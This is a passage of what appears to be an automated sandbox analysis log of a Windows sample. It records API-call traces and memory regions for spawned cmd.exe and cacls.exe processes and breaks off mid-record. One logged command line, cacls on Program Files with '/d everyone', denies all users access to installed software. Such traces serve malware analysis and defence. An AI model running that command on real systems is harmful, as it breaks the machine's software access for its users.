0x0 [0036.463] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e990, lpData=0x22e994, lpcbData=0x22e98c*=0x1000 | out: lpType=0x22e990*=0x4, lpData=0x22e994*=0x40, lpcbData=0x22e98c*=0x4) returned 0x0 [0036.463] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e990, lpData=0x22e994, lpcbData=0x22e98c*=0x1000 | out: lpType=0x22e990*=0x4, lpData=0x22e994*=0x40, lpcbData=0x22e98c*=0x4) returned 0x0 [0036.463] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e990, lpData=0x22e994, lpcbData=0x22e98c*=0x1000 | out: lpType=0x22e990*=0x0, lpData=0x22e994*=0x40, lpcbData=0x22e98c*=0x1000) returned 0x2 [0036.463] RegCloseKey (hKey=0x40) returned 0x0 [0036.463] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e988 | out: phkResult=0x22e988*=0x40) returned 0x0 [0036.463] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e990, lpData=0x22e994, lpcbData=0x22e98c*=0x1000 | out: lpType=0x22e990*=0x0, lpData=0x22e994*=0x40, lpcbData=0x22e98c*=0x1000) returned 0x2 [0036.463] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e990, lpData=0x22e994, lpcbData=0x22e98c*=0x1000 | out: lpType=0x22e990*=0x4, lpData=0x22e994*=0x1, lpcbData=0x22e98c*=0x4) returned 0x0 [0036.463] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e990, lpData=0x22e994, lpcbData=0x22e98c*=0x1000 | out: lpType=0x22e990*=0x0, lpData=0x22e994*=0x1, lpcbData=0x22e98c*=0x1000) returned 0x2 [0036.463] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e990, lpData=0x22e994, lpcbData=0x22e98c*=0x1000 | out: lpType=0x22e990*=0x4, lpData=0x22e994*=0x0, lpcbData=0x22e98c*=0x4) returned 0x0 [0036.463] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e990, lpData=0x22e994, lpcbData=0x22e98c*=0x1000 | out: lpType=0x22e990*=0x4, lpData=0x22e994*=0x9, lpcbData=0x22e98c*=0x4) returned 0x0 [0036.463] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e990, lpData=0x22e994, lpcbData=0x22e98c*=0x1000 | out: lpType=0x22e990*=0x4, lpData=0x22e994*=0x9, lpcbData=0x22e98c*=0x4) returned 0x0 [0036.463] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e990, lpData=0x22e994, lpcbData=0x22e98c*=0x1000 | out: lpType=0x22e990*=0x0, lpData=0x22e994*=0x9, lpcbData=0x22e98c*=0x1000) returned 0x2 [0036.463] RegCloseKey (hKey=0x40) returned 0x0 [0036.463] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa5004f [0036.463] srand (_Seed=0x5aa5004f) [0036.463] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.463] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" [0036.464] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.464] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x604060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0036.464] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0036.464] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0036.464] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0036.464] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0036.464] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0036.464] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0036.464] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0036.464] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0036.464] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0036.464] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0036.464] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0036.464] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0036.464] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0036.464] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f768 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.464] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x22f768, lpFilePart=0x22f764 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x22f764*="Desktop") returned 0x1c [0036.464] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.464] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f4e0 | out: lpFindFileData=0x22f4e0) returned 0x604270 [0036.464] FindClose (in: hFindFile=0x604270 | out: hFindFile=0x604270) returned 1 [0036.464] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x22f4e0 | out: lpFindFileData=0x22f4e0) returned 0x604270 [0036.465] FindClose (in: hFindFile=0x604270 | out: hFindFile=0x604270) returned 1 [0036.465] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0036.465] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x22f4e0 | out: lpFindFileData=0x22f4e0) returned 0x604270 [0036.465] FindClose (in: hFindFile=0x604270 | out: hFindFile=0x604270) returned 1 [0036.465] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0036.465] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0036.465] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0036.465] GetEnvironmentStringsW () returned 0x6060b0* [0036.465] FreeEnvironmentStringsA (penv="=") returned 1 [0036.465] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0036.465] GetConsoleOutputCP () returned 0x1b5 [0036.466] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.466] GetUserDefaultLCID () returned 0x409 [0036.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0036.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f894, cchData=128 | out: lpLCData="0") returned 2 [0036.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f894, cchData=128 | out: lpLCData="0") returned 2 [0036.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f894, cchData=128 | out: lpLCData="1") returned 2 [0036.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0036.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0036.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0036.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0036.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0036.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0036.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0036.466] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0036.466] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0036.466] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0036.466] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0036.467] GetConsoleTitleW (in: lpConsoleTitle=0x604d78, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.467] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.467] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0036.467] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0036.467] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0036.468] _wcsicmp (_String1="echo", _String2=")") returned 60 [0036.468] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0036.468] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0036.468] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0036.468] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0036.468] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0036.468] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0036.468] GetConsoleTitleW (in: lpConsoleTitle=0x22f588, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0036.469] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0036.469] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0036.469] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0036.469] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0036.469] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0036.469] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0036.469] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0036.469] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0036.469] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0036.469] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0036.469] _vsnwprintf (in: _Buffer=0x12c8840, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22f544 | out: _Buffer="y\r\n") returned 3 [0036.469] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.469] GetFileType (hFile=0x28) returned 0x3 [0036.469] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.470] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="y\r\n", cchWideChar=-1, lpMultiByteStr=0x12b6840, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\r\n", lpUsedDefaultChar=0x0) returned 4 [0036.470] WriteFile (in: hFile=0x28, lpBuffer=0x12b6840*, nNumberOfBytesToWrite=0x3, lpNumberOfBytesWritten=0x22f534, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesWritten=0x22f534*=0x3, lpOverlapped=0x0) returned 1 [0036.470] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.470] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.470] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.470] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.470] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.470] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.470] SetConsoleInputExeNameW () returned 0x1 [0036.470] GetConsoleOutputCP () returned 0x1b5 [0036.470] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.470] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.470] exit (_Code=0) Process: id = "23" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0xaf9c000" os_pid = "0xbe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "cacls \"C:\\Program Files\\*.*\" /e /d everyone" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 945 start_va = 0x390000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 946 start_va = 0x3b0000 end_va = 0x3b1fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 947 start_va = 0x3c0000 end_va = 0x3cefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 948 start_va = 0x3d0000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 949 start_va = 0x410000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 950 start_va = 0x450000 end_va = 0x453fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 951 start_va = 0x460000 end_va = 0x460fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 952 start_va = 0x470000 end_va = 0x471fff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 953 start_va = 0xb30000 end_va = 0xb39fff entry_point = 0xb30000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\SysWOW64\\cacls.exe" (normalized: "c:\\windows\\syswow64\\cacls.exe") Region: id = 954 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 955 start_va = 0x7f470000 end_va = 0x7f492fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f470000" filename = "" Region: id = 956 start_va = 0x7f49a000 end_va = 0x7f49cfff entry_point = 0x0 region_type = private name = "private_0x000000007f49a000" filename = "" Region: id = 957 start_va = 0x7f49d000 end_va = 0x7f49dfff entry_point = 0x0 region_type = private name = "private_0x000000007f49d000" filename = "" Region: id = 958 start_va = 0x7f49f000 end_va = 0x7f49ffff entry_point = 0x0 region_type = private name = "private_0x000000007f49f000" filename = "" Region: id = 959 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 960 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 961 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 962 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 976 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 977 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 978 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 979 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 25 os_tid = 0xbe4 Process: id = "24" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1362a000" os_pid = "0x974" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo y\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 980 start_va = 0x160000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 981 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 982 start_va = 0x190000 end_va = 0x19efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 983 start_va = 0x1a0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 984 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 985 start_va = 0x2e0000 end_va = 0x2e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 986 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 987 start_va = 0x300000 end_va = 0x301fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 988 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 989 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 990 start_va = 0x7f310000 end_va = 0x7f332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f310000" filename = "" Region: id = 991 start_va = 0x7f33a000 end_va = 0x7f33afff entry_point = 0x0 region_type = private name = "private_0x000000007f33a000" filename = "" Region: id = 992 start_va = 0x7f33b000 end_va = 0x7f33bfff entry_point = 0x0 region_type = private name = "private_0x000000007f33b000" filename = "" Region: id = 993 start_va = 0x7f33d000 end_va = 0x7f33ffff entry_point = 0x0 region_type = private name = "private_0x000000007f33d000" filename = "" Region: id = 994 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 995 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 996 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 997 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1016 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1017 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1018 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1019 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1020 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 1021 start_va = 0x310000 end_va = 0x38dfff entry_point = 0x310000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1022 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1023 start_va = 0x430000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1024 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1025 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1026 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1027 start_va = 0x7f210000 end_va = 0x7f30ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f210000" filename = "" Region: id = 1028 start_va = 0x170000 end_va = 0x173fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Thread: id = 26 os_tid = 0x8dc [0036.544] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0036.544] __set_app_type (_Type=0x1) [0036.544] __p__fmode () returned 0x76ea1768 [0036.544] __p__commode () returned 0x76ea176c [0036.544] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0036.545] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0036.545] GetCurrentThreadId () returned 0x8dc [0036.545] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8dc) returned 0x30 [0036.545] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0036.545] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0036.545] SetThreadUILanguage (LangId=0x0) returned 0x409 [0036.546] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0036.546] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2dfb5c | out: phkResult=0x2dfb5c*=0x0) returned 0x2 [0036.547] VirtualQuery (in: lpAddress=0x2dfb6b, lpBuffer=0x2dfb04, dwLength=0x1c | out: lpBuffer=0x2dfb04*(BaseAddress=0x2df000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.547] VirtualQuery (in: lpAddress=0x1e0000, lpBuffer=0x2dfb04, dwLength=0x1c | out: lpBuffer=0x2dfb04*(BaseAddress=0x1e0000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0036.547] VirtualQuery (in: lpAddress=0x1e1000, lpBuffer=0x2dfb04, dwLength=0x1c | out: lpBuffer=0x2dfb04*(BaseAddress=0x1e1000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0036.547] VirtualQuery (in: lpAddress=0x1e3000, lpBuffer=0x2dfb04, dwLength=0x1c | out: lpBuffer=0x2dfb04*(BaseAddress=0x1e3000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0036.547] VirtualQuery (in: lpAddress=0x2e0000, lpBuffer=0x2dfb04, dwLength=0x1c | out: lpBuffer=0x2dfb04*(BaseAddress=0x2e0000, AllocationBase=0x2e0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0036.547] GetConsoleOutputCP () returned 0x1b5 [0036.547] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0036.547] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0036.547] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.547] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x0) returned 0 [0036.547] _get_osfhandle (_FileHandle=1) returned 0x28 [0036.547] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0036.547] _get_osfhandle (_FileHandle=0) returned 0x24 [0036.547] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0036.547] GetEnvironmentStringsW () returned 0x434058* [0036.547] FreeEnvironmentStringsA (penv="=") returned 1 [0036.548] GetEnvironmentStringsW () returned 0x434058* [0036.548] FreeEnvironmentStringsA (penv="=") returned 1 [0036.548] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2deaac | out: phkResult=0x2deaac*=0x40) returned 0x0 [0036.548] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2deab4, lpData=0x2deab8, lpcbData=0x2deab0*=0x1000 | out: lpType=0x2deab4*=0x0, lpData=0x2deab8*=0xb2, lpcbData=0x2deab0*=0x1000) returned 0x2 [0036.548] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2deab4, lpData=0x2deab8, lpcbData=0x2deab0*=0x1000 | out: lpType=0x2deab4*=0x4, lpData=0x2deab8*=0x1, lpcbData=0x2deab0*=0x4) returned 0x0 [0036.548] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2deab4, lpData=0x2deab8, lpcbData=0x2deab0*=0x1000 | out: 